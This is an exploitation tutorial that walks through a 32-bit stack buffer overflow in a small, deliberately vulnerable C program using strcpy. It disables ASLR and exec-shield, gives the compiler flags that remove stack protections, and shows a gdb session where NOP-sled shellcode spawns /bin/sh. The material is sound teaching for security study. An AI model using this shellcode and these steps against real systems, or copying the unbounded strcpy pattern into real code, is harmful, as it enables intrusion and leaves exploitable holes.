# Buffer overflow and arbitrary code execution (32-bit)


Disable kernel protections (address-space randomization and exec-shield) so the stack addresses used below stay fixed between runs

# echo '0' > /proc/sys/kernel/randomize_va_space
# echo '0' > /proc/sys/kernel/exec-shield
# echo '0' > /proc/sys/kernel/exec-shield-randomize


Vulnerable code

# cat vulnerable.c
#include <stdio.h>
#include <string.h>

/*
 * Copies the caller-supplied string p into a fixed 64-byte stack buffer
 * with strcpy(), which performs no length check. An argument longer than
 * the buffer overwrites whatever lies above password[] on the stack,
 * including the saved return address into main(). This unbounded copy is
 * the deliberate defect the rest of this page demonstrates; a bounded copy
 * (e.g. a length check on p before copying, or snprintf() into the buffer)
 * would remove it.
 *
 * In:  p - NUL-terminated string; comes from argv[1] and is not bounded
 *          by the caller.
 * Out: prints "Correct password" or "Incorrect password"; no return value.
 */
void check_password(char *p){
        char password[64];              /* fixed size, but no bound is passed to strcpy() below */
        strcpy(password,p);             /* unbounded copy: the overflow happens here */
        if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
        else{printf("Incorrect password\n");}
}

/*
 * Hands the first command-line argument straight to check_password().
 * argc is never checked: when the program is run with no argument,
 * argv[1] is NULL and the strcpy() inside check_password() dereferences
 * a null pointer (a crash, distinct from the overflow shown on this page).
 * A guard such as `if (argc < 2) return 1;` before the call would avoid it.
 * Returns 0 regardless of the password result.
 */
int main(int argc,char **argv){
        check_password(argv[1]);        /* argv[1] length is not limited anywhere */
        return 0;
}
# gcc -g -fno-stack-protector -z execstack -o vulnerable vulnerable.c   # -fno-stack-protector: no stack canary; -z execstack: stack marked executable

Arbitrary code execution

# gdb -q vulnerable
(gdb) list 1,14
1       #include <stdio.h>
2       #include <string.h>
3
4       void check_password(char *p){
5               char password[64];
6               strcpy(password,p);
7               if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
8               else{printf("Incorrect password\n");}
9       }
10
11      int main(int argc,char **argv){
12              check_password(argv[1]);
13              return 0;
14      }
(gdb) break 6
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048477 <+0>:     push   %ebp
   0x08048478 <+1>:     mov    %esp,%ebp
   0x0804847a <+3>:     and    $0xfffffff0,%esp
   0x0804847d <+6>:     sub    $0x10,%esp
   0x08048480 <+9>:     mov    0xc(%ebp),%eax
   0x08048483 <+12>:    add    $0x4,%eax
   0x08048486 <+15>:    mov    (%eax),%eax
   0x08048488 <+17>:    mov    %eax,(%esp)
   0x0804848b <+20>:    call   0x8048414 <check_password>
   0x08048490 <+25>:    mov    $0x0,%eax
   0x08048495 <+30>:    leave
   0x08048496 <+31>:    ret
End of assembler dump.
(gdb) run wakamole
Starting program: /vulnerable wakamole

Breakpoint 1, check_password (p=0xbffff935 "wakamole") at vulnerable.c:6
6               strcpy(password,p);
(gdb) x /20x password
0xbffff6f0:     0x08048261      0x00000000      0x00ca0000      0x00000001
0xbffff700:     0xbffff91f      0x0000002f      0xbffff75c      0xb7fd1ff4
0xbffff710:     0x080484a0      0x08049ff4      0x00000002      0x080482fd
0xbffff720:     0xb7fd23e4      0x00000005      0x08049ff4      0x080484c1
0xbffff730:     0x00000000      0x00000000      0xbffff758      0x08048490
(gdb) run `perl -e 'print "\x90"x16 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\x90" . "\xb0\xf6\xff\xbf"x9'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /vulnerable `perl -e 'print "\x90"x16 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\x90" . "\xb0\xf6\xff\xbf"x9'`

Breakpoint 1, check_password (
    p=0xbffff8ed "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300\231\260\vRh//shh/bin\211\343R\211\342S\211\341̀\220\220\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277")
    at vulnerable.c:6
6               strcpy(password,p);
(gdb) x /20x password
0xbffff6b0:     0x08048261      0x00000000      0x00ca0000      0x00000001
0xbffff6c0:     0xbffff8d7      0x0000002f      0xbffff71c      0xb7fd1ff4
0xbffff6d0:     0x080484a0      0x08049ff4      0x00000002      0x080482fd
0xbffff6e0:     0xb7fd23e4      0x00000005      0x08049ff4      0x080484c1
0xbffff6f0:     0x00000000      0x00000000      0xbffff718      0x08048490
(gdb) next
7               if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
(gdb) x /20x password
0xbffff6b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff6c0:     0xb099c031      0x2f68520b      0x6868732f      0x6e69622f
0xbffff6d0:     0x8952e389      0xe18953e2      0x909080cd      0xbffff6b0
0xbffff6e0:     0xbffff6b0      0xbffff6b0      0xbffff6b0      0xbffff6b0
0xbffff6f0:     0xbffff6b0      0xbffff6b0      0xbffff6b0      0xbffff6b0
(gdb) continue
Incorrect password
process 2246 is executing new program: /bin/dash
# exit


References

http://www.overflowedminds.net/Papers/Newlog/Introduccion-Explotacion-Software-Linux.pdf
